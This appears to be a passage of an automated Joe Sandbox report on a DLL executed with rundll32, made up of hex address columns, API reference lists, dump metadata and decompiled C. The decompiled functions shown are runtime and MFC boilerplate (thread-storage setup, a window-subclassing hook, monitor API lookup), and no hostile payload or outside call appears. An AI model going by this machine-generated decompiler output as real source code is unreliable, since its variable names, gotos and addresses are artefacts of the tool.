                                                                                                                                                                            0x1001c261
                                                                                                                                                                            0x1001c262
                                                                                                                                                                            0x1001c276
                                                                                                                                                                            0x1001c278
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001c27a
                                                                                                                                                                            0x1001c27a
                                                                                                                                                                            0x1001c27c
                                                                                                                                                                            0x1001c27d
                                                                                                                                                                            0x1001c284
                                                                                                                                                                            0x1001c28a
                                                                                                                                                                            0x1001c28e
                                                                                                                                                                            0x1001c292
                                                                                                                                                                            0x1001c292
                                                                                                                                                                            0x1001c278
                                                                                                                                                                            0x1001c25f
                                                                                                                                                                            0x1001c24b
                                                                                                                                                                            0x1001c22e
                                                                                                                                                                            0x1001c1d9
                                                                                                                                                                            0x1001c29e
                                                                                                                                                                            0x1001c12d
                                                                                                                                                                            0x1001c12d
                                                                                                                                                                            0x1001c135
                                                                                                                                                                            0x1001c135

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,10017978,?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001C121
                                                                                                                                                                            • __mtterm.LIBCMT ref: 1001C12D
                                                                                                                                                                              • Part of subcall function 1001BE05: __decode_pointer.LIBCMT ref: 1001BE16
                                                                                                                                                                              • Part of subcall function 1001BE05: TlsFree.KERNEL32(0000001F,10017A14,?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001BE30
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 1001C143
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 1001C150
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 1001C15D
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 1001C16A
                                                                                                                                                                            • TlsAlloc.KERNEL32(?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001C1BA
                                                                                                                                                                            • TlsSetValue.KERNEL32(00000000,?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001C1D5
                                                                                                                                                                            • __init_pointers.LIBCMT ref: 1001C1DF
                                                                                                                                                                            • __encode_pointer.LIBCMT ref: 1001C1EA
                                                                                                                                                                            • __encode_pointer.LIBCMT ref: 1001C1FA
                                                                                                                                                                            • __encode_pointer.LIBCMT ref: 1001C20A
                                                                                                                                                                            • __encode_pointer.LIBCMT ref: 1001C21A
                                                                                                                                                                            • __decode_pointer.LIBCMT ref: 1001C23B
                                                                                                                                                                            • __calloc_crt.LIBCMT ref: 1001C254
                                                                                                                                                                            • __decode_pointer.LIBCMT ref: 1001C26E
                                                                                                                                                                            • __initptd.LIBCMT ref: 1001C27D
                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 1001C284
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressProc__encode_pointer$__decode_pointer$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                                                                                                                                            • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                            • API String ID: 2657569430-3819984048
                                                                                                                                                                            • Opcode ID: f8eb42d05a0f46123fcd151e30e2a53c2e7fcd681058195d0d7fb9ca21756e1b
                                                                                                                                                                            • Instruction ID: b5f7097eefea174a9ed91942db92a94305995674aef8197461d434292f48097b
                                                                                                                                                                            • Opcode Fuzzy Hash: f8eb42d05a0f46123fcd151e30e2a53c2e7fcd681058195d0d7fb9ca21756e1b
                                                                                                                                                                            • Instruction Fuzzy Hash: E4319335900735AFEB11EFB59CCEA4A3BF1EB46360B144526F5049A1B1EBB5D8C0CB60
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                            			E10011389(void* __ebx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                                                                                                                                            				intOrPtr _t54;
                                                                                                                                                                            				void* _t55;
                                                                                                                                                                            				signed int _t56;
                                                                                                                                                                            				void* _t59;
                                                                                                                                                                            				long _t60;
                                                                                                                                                                            				signed int _t64;
                                                                                                                                                                            				void* _t66;
                                                                                                                                                                            				short _t72;
                                                                                                                                                                            				signed int _t74;
                                                                                                                                                                            				signed int _t76;
                                                                                                                                                                            				long _t83;
                                                                                                                                                                            				signed int _t86;
                                                                                                                                                                            				signed short _t87;
                                                                                                                                                                            				signed int _t88;
                                                                                                                                                                            				int _t94;
                                                                                                                                                                            				void* _t106;
                                                                                                                                                                            				long* _t108;
                                                                                                                                                                            				long _t110;
                                                                                                                                                                            				signed int _t111;
                                                                                                                                                                            				CHAR* _t112;
                                                                                                                                                                            				intOrPtr _t113;
                                                                                                                                                                            				void* _t116;
                                                                                                                                                                            				void* _t119;
                                                                                                                                                                            				intOrPtr _t120;
                                                                                                                                                                            
                                                                                                                                                                            				_t119 = __eflags;
                                                                                                                                                                            				_t105 = __edi;
                                                                                                                                                                            				_push(0x148);
                                                                                                                                                                            				E10017C2A(E1002866E, __ebx, __edi, __esi);
                                                                                                                                                                            				_t110 =  *(_t116 + 0x10);
                                                                                                                                                                            				_t94 =  *(_t116 + 0xc);
                                                                                                                                                                            				_push(0x1000a0f5);
                                                                                                                                                                            				 *(_t116 - 0x120) = _t110;
                                                                                                                                                                            				_t54 = E10013D98(_t94, 0x10058f44, __edi, _t110, _t119);
                                                                                                                                                                            				_t120 = _t54;
                                                                                                                                                                            				_t97 = 0 | _t120 == 0x00000000;
                                                                                                                                                                            				 *((intOrPtr*)(_t116 - 0x11c)) = _t54;
                                                                                                                                                                            				_t121 = _t120 == 0;
                                                                                                                                                                            				if(_t120 == 0) {
                                                                                                                                                                            					_t54 = E1000A0DB(_t94, _t97, __edi, _t110, _t121);
                                                                                                                                                                            				}
                                                                                                                                                                            				if( *(_t116 + 8) == 3) {
                                                                                                                                                                            					_t106 =  *_t110;
                                                                                                                                                                            					_t111 =  *(_t54 + 0x14);
                                                                                                                                                                            					_t55 = E1000D5EC(_t94, _t106, _t111, __eflags);
                                                                                                                                                                            					__eflags = _t111;
                                                                                                                                                                            					_t56 =  *(_t55 + 0x14) & 0x000000ff;
                                                                                                                                                                            					 *(_t116 - 0x124) = _t56;
                                                                                                                                                                            					if(_t111 != 0) {
                                                                                                                                                                            						L7:
                                                                                                                                                                            						__eflags =  *0x1005acbc;
                                                                                                                                                                            						if( *0x1005acbc == 0) {
                                                                                                                                                                            							L12:
                                                                                                                                                                            							__eflags = _t111;
                                                                                                                                                                            							if(__eflags == 0) {
                                                                                                                                                                            								__eflags =  *0x1005a8dc;
                                                                                                                                                                            								if( *0x1005a8dc != 0) {
                                                                                                                                                                            									L19:
                                                                                                                                                                            									__eflags = (GetClassLongA(_t94, 0xffffffe0) & 0x0000ffff) -  *0x1005a8dc; // 0x0
                                                                                                                                                                            									if(__eflags != 0) {
                                                                                                                                                                            										L23:
                                                                                                                                                                            										_t59 = GetWindowLongA(_t94, 0xfffffffc);
                                                                                                                                                                            										__eflags = _t59;
                                                                                                                                                                            										 *(_t116 - 0x14) = _t59;
                                                                                                                                                                            										if(_t59 != 0) {
                                                                                                                                                                            											_t112 = "AfxOldWndProc423";
                                                                                                                                                                            											_t64 = GetPropA(_t94, _t112);
                                                                                                                                                                            											__eflags = _t64;
                                                                                                                                                                            											if(_t64 == 0) {
                                                                                                                                                                            												SetPropA(_t94, _t112,  *(_t116 - 0x14));
                                                                                                                                                                            												_t66 = GetPropA(_t94, _t112);
                                                                                                                                                                            												__eflags = _t66 -  *(_t116 - 0x14);
                                                                                                                                                                            												if(_t66 ==  *(_t116 - 0x14)) {
                                                                                                                                                                            													GlobalAddAtomA(_t112);
                                                                                                                                                                            													SetWindowLongA(_t94, 0xfffffffc, E10011245);
                                                                                                                                                                            												}
                                                                                                                                                                            											}
                                                                                                                                                                            										}
                                                                                                                                                                            										L27:
                                                                                                                                                                            										_t105 =  *((intOrPtr*)(_t116 - 0x11c));
                                                                                                                                                                            										_t60 = CallNextHookEx( *(_t105 + 0x28), 3, _t94,  *(_t116 - 0x120));
                                                                                                                                                                            										__eflags =  *(_t116 - 0x124);
                                                                                                                                                                            										_t110 = _t60;
                                                                                                                                                                            										if( *(_t116 - 0x124) != 0) {
                                                                                                                                                                            											UnhookWindowsHookEx( *(_t105 + 0x28));
                                                                                                                                                                            											_t50 = _t105 + 0x28;
                                                                                                                                                                            											 *_t50 =  *(_t105 + 0x28) & 0x00000000;
                                                                                                                                                                            											__eflags =  *_t50;
                                                                                                                                                                            										}
                                                                                                                                                                            										goto L30;
                                                                                                                                                                            									}
                                                                                                                                                                            									goto L27;
                                                                                                                                                                            								}
                                                                                                                                                                            								_t113 = 0x30;
                                                                                                                                                                            								E100174D0(_t106, _t116 - 0x154, 0, _t113);
                                                                                                                                                                            								 *((intOrPtr*)(_t116 - 0x154)) = _t113;
                                                                                                                                                                            								_push(_t116 - 0x154);
                                                                                                                                                                            								_push("#32768");
                                                                                                                                                                            								_push(0);
                                                                                                                                                                            								_t72 = E1000E5E2(_t94, _t97, _t106, "#32768", __eflags);
                                                                                                                                                                            								__eflags = _t72;
                                                                                                                                                                            								 *0x1005a8dc = _t72;
                                                                                                                                                                            								if(_t72 == 0) {
                                                                                                                                                                            									_t74 = GetClassNameA(_t94, _t116 - 0x118, 0x100);
                                                                                                                                                                            									__eflags = _t74;
                                                                                                                                                                            									if(_t74 == 0) {
                                                                                                                                                                            										goto L23;
                                                                                                                                                                            									}
                                                                                                                                                                            									 *((char*)(_t116 - 0x19)) = 0;
                                                                                                                                                                            									_t76 = E100199C1(_t116 - 0x118, "#32768");
                                                                                                                                                                            									__eflags = _t76;
                                                                                                                                                                            									if(_t76 == 0) {
                                                                                                                                                                            										goto L27;
                                                                                                                                                                            									}
                                                                                                                                                                            									goto L23;
                                                                                                                                                                            								}
                                                                                                                                                                            								goto L19;
                                                                                                                                                                            							}
                                                                                                                                                                            							E1000D638(_t116 - 0x18, __eflags,  *((intOrPtr*)(_t111 + 0x1c)));
                                                                                                                                                                            							 *(_t116 - 4) =  *(_t116 - 4) & 0x00000000;
                                                                                                                                                                            							E1000FB9D(_t111, _t116, _t94);
                                                                                                                                                                            							 *((intOrPtr*)( *_t111 + 0x50))();
                                                                                                                                                                            							_t108 =  *((intOrPtr*)( *_t111 + 0xf0))();
                                                                                                                                                                            							_t83 = SetWindowLongA(_t94, 0xfffffffc, E1001025C);
                                                                                                                                                                            							__eflags = _t83 - E1001025C;
                                                                                                                                                                            							if(_t83 != E1001025C) {
                                                                                                                                                                            								 *_t108 = _t83;
                                                                                                                                                                            							}
                                                                                                                                                                            							 *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) =  *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) & 0x00000000;
                                                                                                                                                                            							 *(_t116 - 4) =  *(_t116 - 4) | 0xffffffff;
                                                                                                                                                                            							__eflags =  *(_t116 - 0x14);
                                                                                                                                                                            							if( *(_t116 - 0x14) != 0) {
                                                                                                                                                                            								_push( *(_t116 - 0x18));
                                                                                                                                                                            								_push(0);
                                                                                                                                                                            								E1000CEFC();
                                                                                                                                                                            							}
                                                                                                                                                                            							goto L27;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t86 = GetClassLongA(_t94, 0xffffffe6);
                                                                                                                                                                            						__eflags = _t86 & 0x00010000;
                                                                                                                                                                            						if((_t86 & 0x00010000) != 0) {
                                                                                                                                                                            							goto L27;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t87 =  *(_t106 + 0x28);
                                                                                                                                                                            						__eflags = _t87 - 0xffff;
                                                                                                                                                                            						if(_t87 <= 0xffff) {
                                                                                                                                                                            							 *(_t116 - 0x18) = 0;
                                                                                                                                                                            							GlobalGetAtomNameA( *(_t106 + 0x28) & 0x0000ffff, _t116 - 0x18, 5);
                                                                                                                                                                            							_t87 = _t116 - 0x18;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t88 = E1000A7E1(_t87, "ime");
                                                                                                                                                                            						__eflags = _t88;
                                                                                                                                                                            						_pop(_t97);
                                                                                                                                                                            						if(_t88 == 0) {
                                                                                                                                                                            							goto L27;
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L12;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags =  *(_t106 + 0x20) & 0x40000000;
                                                                                                                                                                            					if(( *(_t106 + 0x20) & 0x40000000) != 0) {
                                                                                                                                                                            						goto L27;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eflags = _t56;
                                                                                                                                                                            					if(_t56 != 0) {
                                                                                                                                                                            						goto L27;
                                                                                                                                                                            					}
                                                                                                                                                                            					goto L7;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					CallNextHookEx( *(_t54 + 0x28),  *(_t116 + 8), _t94, _t110);
                                                                                                                                                                            					L30:
                                                                                                                                                                            					return E10017C74(_t94, _t105, _t110);
                                                                                                                                                                            				}
                                                                                                                                                                            			}



























                                                                                                                                                                            0x10011389
                                                                                                                                                                            0x10011389
                                                                                                                                                                            0x10011389
                                                                                                                                                                            0x10011393
                                                                                                                                                                            0x10011398
                                                                                                                                                                            0x1001139b
                                                                                                                                                                            0x1001139e
                                                                                                                                                                            0x100113a8
                                                                                                                                                                            0x100113ae
                                                                                                                                                                            0x100113b5
                                                                                                                                                                            0x100113b7
                                                                                                                                                                            0x100113ba
                                                                                                                                                                            0x100113c0
                                                                                                                                                                            0x100113c2
                                                                                                                                                                            0x100113c4
                                                                                                                                                                            0x100113c4
                                                                                                                                                                            0x100113cd
                                                                                                                                                                            0x100113e2
                                                                                                                                                                            0x100113e4
                                                                                                                                                                            0x100113e7
                                                                                                                                                                            0x100113ec
                                                                                                                                                                            0x100113ee
                                                                                                                                                                            0x100113f2
                                                                                                                                                                            0x100113f8
                                                                                                                                                                            0x1001140f
                                                                                                                                                                            0x1001140f
                                                                                                                                                                            0x10011416
                                                                                                                                                                            0x10011463
                                                                                                                                                                            0x10011463
                                                                                                                                                                            0x10011465
                                                                                                                                                                            0x100114cd
                                                                                                                                                                            0x100114d5
                                                                                                                                                                            0x10011511
                                                                                                                                                                            0x1001151d
                                                                                                                                                                            0x10011524
                                                                                                                                                                            0x10011556
                                                                                                                                                                            0x10011559
                                                                                                                                                                            0x1001155f
                                                                                                                                                                            0x10011561
                                                                                                                                                                            0x10011564
                                                                                                                                                                            0x1001156c
                                                                                                                                                                            0x10011573
                                                                                                                                                                            0x10011575
                                                                                                                                                                            0x10011577
                                                                                                                                                                            0x1001157e
                                                                                                                                                                            0x10011586
                                                                                                                                                                            0x10011588
                                                                                                                                                                            0x1001158b
                                                                                                                                                                            0x1001158e
                                                                                                                                                                            0x1001159c
                                                                                                                                                                            0x1001159c
                                                                                                                                                                            0x1001158b
                                                                                                                                                                            0x10011577
                                                                                                                                                                            0x100115a2
                                                                                                                                                                            0x100115a8
                                                                                                                                                                            0x100115b4
                                                                                                                                                                            0x100115ba
                                                                                                                                                                            0x100115c1
                                                                                                                                                                            0x100115c3
                                                                                                                                                                            0x100115c8
                                                                                                                                                                            0x100115ce
                                                                                                                                                                            0x100115ce
                                                                                                                                                                            0x100115ce
                                                                                                                                                                            0x100115ce
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100115d2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10011526
                                                                                                                                                                            0x100114d9
                                                                                                                                                                            0x100114e4
                                                                                                                                                                            0x100114ef
                                                                                                                                                                            0x100114f5
                                                                                                                                                                            0x100114fb
                                                                                                                                                                            0x100114fc
                                                                                                                                                                            0x100114fe
                                                                                                                                                                            0x10011506
                                                                                                                                                                            0x10011509
                                                                                                                                                                            0x1001150f
                                                                                                                                                                            0x10011535
                                                                                                                                                                            0x1001153b
                                                                                                                                                                            0x1001153d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10011547
                                                                                                                                                                            0x1001154b
                                                                                                                                                                            0x10011550
                                                                                                                                                                            0x10011554
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10011554
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001150f
                                                                                                                                                                            0x1001146d
                                                                                                                                                                            0x10011472
                                                                                                                                                                            0x10011479
                                                                                                                                                                            0x10011482
                                                                                                                                                                            0x10011498
                                                                                                                                                                            0x1001149a
                                                                                                                                                                            0x100114a0
                                                                                                                                                                            0x100114a2
                                                                                                                                                                            0x100114a4
                                                                                                                                                                            0x100114a4
                                                                                                                                                                            0x100114ac
                                                                                                                                                                            0x100114b0
                                                                                                                                                                            0x100114b4
                                                                                                                                                                            0x100114b8
                                                                                                                                                                            0x100114be
                                                                                                                                                                            0x100114c1
                                                                                                                                                                            0x100114c3
                                                                                                                                                                            0x100114c3
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100114b8
                                                                                                                                                                            0x1001141b
                                                                                                                                                                            0x10011421
                                                                                                                                                                            0x10011426
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001142c
                                                                                                                                                                            0x1001142f
                                                                                                                                                                            0x10011434
                                                                                                                                                                            0x10011441
                                                                                                                                                                            0x10011445
                                                                                                                                                                            0x1001144b
                                                                                                                                                                            0x1001144b
                                                                                                                                                                            0x10011454
                                                                                                                                                                            0x10011459
                                                                                                                                                                            0x1001145c
                                                                                                                                                                            0x1001145d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001145d
                                                                                                                                                                            0x100113fa
                                                                                                                                                                            0x10011401
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10011407
                                                                                                                                                                            0x10011409
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100113cf
                                                                                                                                                                            0x100113d7
                                                                                                                                                                            0x100115d4
                                                                                                                                                                            0x100115d9
                                                                                                                                                                            0x100115d9

                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 10011393
                                                                                                                                                                              • Part of subcall function 10013D98: __EH_prolog3.LIBCMT ref: 10013D9F
                                                                                                                                                                            • CallNextHookEx.USER32 ref: 100113D7
                                                                                                                                                                              • Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
                                                                                                                                                                              • Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC
                                                                                                                                                                            • GetClassLongA.USER32 ref: 1001141B
                                                                                                                                                                            • GlobalGetAtomNameA.KERNEL32 ref: 10011445
                                                                                                                                                                            • SetWindowLongA.USER32 ref: 1001149A
                                                                                                                                                                            • _memset.LIBCMT ref: 100114E4
                                                                                                                                                                            • GetClassLongA.USER32 ref: 10011514
                                                                                                                                                                            • GetClassNameA.USER32(?,?,00000100), ref: 10011535
                                                                                                                                                                            • GetWindowLongA.USER32 ref: 10011559
                                                                                                                                                                            • GetPropA.USER32 ref: 10011573
                                                                                                                                                                            • SetPropA.USER32 ref: 1001157E
                                                                                                                                                                            • GetPropA.USER32 ref: 10011586
                                                                                                                                                                            • GlobalAddAtomA.KERNEL32 ref: 1001158E
                                                                                                                                                                            • SetWindowLongA.USER32 ref: 1001159C
                                                                                                                                                                            • CallNextHookEx.USER32 ref: 100115B4
                                                                                                                                                                            • UnhookWindowsHookEx.USER32(?), ref: 100115C8
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Long$ClassHookPropWindow$AtomCallGlobalH_prolog3NameNext$Exception@8H_prolog3_ThrowUnhookWindows_memset
                                                                                                                                                                            • String ID: #32768$AfxOldWndProc423$ime
                                                                                                                                                                            • API String ID: 1191297049-4034971020
                                                                                                                                                                            • Opcode ID: a59f08c89f11fe6b3e13f01d104cbc0d9868f5cf59dfadfd77116e560bc0dc28
                                                                                                                                                                            • Instruction ID: 45731ac5847e6eda9355a9c996fe1b8867c86b30351497dbe8ef7f26860efac9
                                                                                                                                                                            • Opcode Fuzzy Hash: a59f08c89f11fe6b3e13f01d104cbc0d9868f5cf59dfadfd77116e560bc0dc28
                                                                                                                                                                            • Instruction Fuzzy Hash: 09619E31900666EFEB14DB61CC49BDE7BA9EF483A1F214254F506AB191DB34DEC1CBA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 97%
                                                                                                                                                                            			E1000D6C3() {
                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                            				void* __esi;
                                                                                                                                                                            				struct HINSTANCE__* _t5;
                                                                                                                                                                            				_Unknown_base(*)()* _t6;
                                                                                                                                                                            				_Unknown_base(*)()* _t7;
                                                                                                                                                                            				_Unknown_base(*)()* _t8;
                                                                                                                                                                            				_Unknown_base(*)()* _t9;
                                                                                                                                                                            				_Unknown_base(*)()* _t10;
                                                                                                                                                                            				_Unknown_base(*)()* _t11;
                                                                                                                                                                            				_Unknown_base(*)()* _t12;
                                                                                                                                                                            				struct HINSTANCE__* _t18;
                                                                                                                                                                            				void* _t20;
                                                                                                                                                                            				intOrPtr _t23;
                                                                                                                                                                            				_Unknown_base(*)()* _t24;
                                                                                                                                                                            
                                                                                                                                                                            				_t23 =  *0x1005a76c; // 0x0
                                                                                                                                                                            				if(_t23 == 0) {
                                                                                                                                                                            					_push(_t20);
                                                                                                                                                                            					 *0x1005a770 = E1000D66B(0, _t20, __eflags);
                                                                                                                                                                            					_t18 = GetModuleHandleA("USER32");
                                                                                                                                                                            					__eflags = _t18;
                                                                                                                                                                            					if(_t18 == 0) {
                                                                                                                                                                            						L12:
                                                                                                                                                                            						 *0x1005a750 = 0;
                                                                                                                                                                            						 *0x1005a754 = 0;
                                                                                                                                                                            						 *0x1005a758 = 0;
                                                                                                                                                                            						 *0x1005a75c = 0;
                                                                                                                                                                            						 *0x1005a760 = 0;
                                                                                                                                                                            						 *0x1005a764 = 0;
                                                                                                                                                                            						 *0x1005a768 = 0;
                                                                                                                                                                            						_t5 = 0;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
                                                                                                                                                                            						__eflags = _t6;
                                                                                                                                                                            						 *0x1005a750 = _t6;
                                                                                                                                                                            						if(_t6 == 0) {
                                                                                                                                                                            							goto L12;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
                                                                                                                                                                            							__eflags = _t7;
                                                                                                                                                                            							 *0x1005a754 = _t7;
                                                                                                                                                                            							if(_t7 == 0) {
                                                                                                                                                                            								goto L12;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_t8 = GetProcAddress(_t18, "MonitorFromRect");
                                                                                                                                                                            								__eflags = _t8;
                                                                                                                                                                            								 *0x1005a758 = _t8;
                                                                                                                                                                            								if(_t8 == 0) {
                                                                                                                                                                            									goto L12;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
                                                                                                                                                                            									__eflags = _t9;
                                                                                                                                                                            									 *0x1005a75c = _t9;
                                                                                                                                                                            									if(_t9 == 0) {
                                                                                                                                                                            										goto L12;
                                                                                                                                                                            									} else {
                                                                                                                                                                            										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
                                                                                                                                                                            										__eflags = _t10;
                                                                                                                                                                            										 *0x1005a764 = _t10;
                                                                                                                                                                            										if(_t10 == 0) {
                                                                                                                                                                            											goto L12;
                                                                                                                                                                            										} else {
                                                                                                                                                                            											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
                                                                                                                                                                            											__eflags = _t11;
                                                                                                                                                                            											 *0x1005a760 = _t11;
                                                                                                                                                                            											if(_t11 == 0) {
                                                                                                                                                                            												goto L12;
                                                                                                                                                                            											} else {
                                                                                                                                                                            												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
                                                                                                                                                                            												__eflags = _t12;
                                                                                                                                                                            												 *0x1005a768 = _t12;
                                                                                                                                                                            												if(_t12 == 0) {
                                                                                                                                                                            													goto L12;
                                                                                                                                                                            												} else {
                                                                                                                                                                            													_t5 = 1;
                                                                                                                                                                            													__eflags = 1;
                                                                                                                                                                            												}
                                                                                                                                                                            											}
                                                                                                                                                                            										}
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					 *0x1005a76c = 1;
                                                                                                                                                                            					return _t5;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t24 =  *0x1005a760; // 0x0
                                                                                                                                                                            					return 0 | _t24 != 0x00000000;
                                                                                                                                                                            				}
                                                                                                                                                                            			}

















                                                                                                                                                                            0x1000d6c6
                                                                                                                                                                            0x1000d6cc
                                                                                                                                                                            0x1000d6db
                                                                                                                                                                            0x1000d6e7
                                                                                                                                                                            0x1000d6f2
                                                                                                                                                                            0x1000d6f4
                                                                                                                                                                            0x1000d6f6
                                                                                                                                                                            0x1000d78a
                                                                                                                                                                            0x1000d78a
                                                                                                                                                                            0x1000d790
                                                                                                                                                                            0x1000d796
                                                                                                                                                                            0x1000d79c
                                                                                                                                                                            0x1000d7a2
                                                                                                                                                                            0x1000d7a8
                                                                                                                                                                            0x1000d7ae
                                                                                                                                                                            0x1000d7b4
                                                                                                                                                                            0x1000d6fc
                                                                                                                                                                            0x1000d708
                                                                                                                                                                            0x1000d70a
                                                                                                                                                                            0x1000d70c
                                                                                                                                                                            0x1000d711
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000d713
                                                                                                                                                                            0x1000d719
                                                                                                                                                                            0x1000d71b
                                                                                                                                                                            0x1000d71d
                                                                                                                                                                            0x1000d722
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000d724
                                                                                                                                                                            0x1000d72a
                                                                                                                                                                            0x1000d72c
                                                                                                                                                                            0x1000d72e
                                                                                                                                                                            0x1000d733
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000d735
                                                                                                                                                                            0x1000d73b
                                                                                                                                                                            0x1000d73d
                                                                                                                                                                            0x1000d73f
                                                                                                                                                                            0x1000d744
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000d746
                                                                                                                                                                            0x1000d74c
                                                                                                                                                                            0x1000d74e
                                                                                                                                                                            0x1000d750
                                                                                                                                                                            0x1000d755
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000d757
                                                                                                                                                                            0x1000d75d
                                                                                                                                                                            0x1000d75f
                                                                                                                                                                            0x1000d761
                                                                                                                                                                            0x1000d766
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000d768
                                                                                                                                                                            0x1000d76e
                                                                                                                                                                            0x1000d770
                                                                                                                                                                            0x1000d772
                                                                                                                                                                            0x1000d777
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000d779
                                                                                                                                                                            0x1000d77b
                                                                                                                                                                            0x1000d77b
                                                                                                                                                                            0x1000d77b
                                                                                                                                                                            0x1000d777
                                                                                                                                                                            0x1000d766
                                                                                                                                                                            0x1000d755
                                                                                                                                                                            0x1000d744
                                                                                                                                                                            0x1000d733
                                                                                                                                                                            0x1000d722
                                                                                                                                                                            0x1000d711
                                                                                                                                                                            0x1000d77e
                                                                                                                                                                            0x1000d789
                                                                                                                                                                            0x1000d6ce
                                                                                                                                                                            0x1000d6d0
                                                                                                                                                                            0x1000d6da
                                                                                                                                                                            0x1000d6da

                                                                                                                                                                            APIs
